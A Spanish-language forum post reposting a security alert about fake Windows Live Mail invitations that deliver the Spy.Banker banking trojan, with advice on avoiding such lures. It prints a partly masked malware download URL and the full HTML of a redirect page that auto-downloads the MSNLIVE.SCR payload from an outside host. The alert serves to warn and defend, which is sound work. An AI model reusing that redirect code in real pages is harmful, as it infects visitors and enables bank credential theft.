FRIHOSTFORUMSSEARCHFAQTOSBLOGSCOMPETITIONS
You are invited to Log in or Register a free Frihost Account!


Falsa invitación a Windows Live Mail propaga troyano





Locklear
Falsa invitación a Windows Live Mail propaga troyano
http://www.vsantivirus.com/phis-wlm-banker-260105.htm

Por Angela Ruiz
angela@videosoft.net.uy

Todavía en su versión beta, Windows Live Mail es la respuesta de Microsoft a los servicios de correo como Gmail y otros. Básicamente, su interfase es muy similar al Outlook. Se puede navegar por distintos mensajes sin recargar la página, y posee nuevas opciones para combatir el phishing y el spam.

Por el momento, la única forma de acceder al nuevo servicio, es por medio de invitaciones (algo similar al sistema de Google para obtener una cuenta de Gmail).

El problema es que cuando recibimos este tipo de mensajes, es muy fácil caer en una trampa como la que motiva esta alerta.


Ya se han detectado falsas invitaciones que proponen al usuario acceder al nuevo servicio de Microsoft. Pero si se hace clic en un botón que indica el enlace a una demostración del sitio, en realidad se descarga una variante de la familia de troyanos del tipo Banker (en este caso Win32/Spy.Banker.AHY, según indica NOD32).



Aunque no es nueva esta forma de propagación (los Banker y otros similares se envían en forma de spam, falsas tarjetas de salutaciones o cualquier otro tipo de mensaje que engañe al usuario para que descargue y ejecute de Internet al troyano propiamente dicho), el peligro en este caso, está en la confianza que puede significar una invitación similar a la que podríamos recibir de un servicio legítimo (Windows Live Mail). Por supuesto, también podrían utilizarse trucos similares con otros servicios, como Gmail por ejemplo.

En el caso aquí comentado, el falso mensaje está redactado en portugués, sencillamente porque el Win32/Spy.Banker se especializa en robar cuentas bancarias y otra información crítica, relacionada generalmente con instituciones bancarias brasileras. Sin embargo, nada impide que aparezcan mensajes con ideas similares, en otros idiomas, incluido español.

Es importante que siempre tengamos en cuenta las reglas básicas para una computación segura, que en el caso del correo electrónico consisten en no hacer clic sobre enlaces de mensajes no solicitados (aún cuando parezcan legítimos como en este caso, y/o enviados por conocidos), ni tampoco abrir adjuntos.

Antes de aceptar este tipo de invitación, debemos estar muy seguros de que lo envía alguien conocido (y que realmente es esa persona quien lo hace).

Detalles técnicos del falso mensaje

En el caso del Outlook Express 6, el mensaje visualiza la imagen del botón con el enlace al troyano, solo si se tiene desactivada la opción "Leer todos los mensajes como texto sin formato" (Herramientas, Opciones, Leer). Se recomienda tener esa opción siempre tildada.

El código del mensaje está codificado en base 64. De este modo, no es visible el verdadero enlace si se examinan sus propiedades:

Content-Type: text/html
Content-Transfer-Encoding: base64

El enlace descarga el troyano Win32/Spy.Banker.AHY, en un archivo llamado MSNLIVE.SCR, de un enlace que corresponde a la Facultad de Ciencias de la Universidad de Valladolid (está activo al momento de esta alerta).

http : / / ???????????.cie.uva.es/microsoft/msnlive.scr

NOTA VSA 31/01/06: Se han recibido nuevas muestras, prácticamente similares, pero que descargan el troyano de forma automática desde diferentes sitios de Internet. Por ejemplo, uno de ellos abre una página cuyo contenido es el siguiente:

<HTML><HEAD><TITLE>MSN Live</TITLE><META NAME="Keywords" CONTENT=""><META HTTP-EQUIV="Refresh" CONTENT="0;URL=http://www.????a.br/microsoft/msnlive.scr"><script src="http://support.sitelutions.com/sl/popunder.js" language="JavaScript1.1" type="text/javascript"></script><META NAME="Description" CONTENT=""></HEAD><BODY></BODY></HTML>

Esto hace que se descargue automáticamente el archivo MSNLIVE.SCR de un sitio en un servidor de origen brasileño. NOD32 lo detecta como Win32/Spy.Banker.AHY.

La protección contra elementos emergentes del Internet Explorer 6.0 de Windows XP SP2, también advierte la descarga de este tipo de archivo y evita su ejecución (Herramientas, Bloqueador de elementos emergentes).


Más información

Spy.Banker.AHY. Roba información de cuentas bancarias
http://www.vsantivirus.com/spy-banker-ahy.htm

Spy.Banker. Roba información de cuentas bancarias
http://www.vsantivirus.com/spy-banker.htm
Related topics
[OFFICIAL] MSN Messenger 8.0 or Windows Live Messenger
Windows Live Mail Beta - My opinions
Windows Live Mail Beta
Windows Live Messenger Features
Windows Live Messenger Davetiyeleri!
Windows Live BETA
An official thread for Windows Live Mail
Windows Live Messenger Goes Public
Microsoft Windows Live Messenger Goes Public!
Frih Email and Windows Live Mail
Is Outlook Express being Replaced by Windows Live Mail?
Manutenção - Windows Live Mail, corretor ortográfico
Yeni Windows Live Paketinin Ayak Sesleri
Problem with Windows Live Mail settings (For Sending Mail)
Reply to topic    Frihost Forum Index -> Language Forums -> Spanish

FRIHOST HOME | FAQ | TOS | ABOUT US | CONTACT US | SITE MAP
© 2005-2011 Frihost, forums powered by phpBB.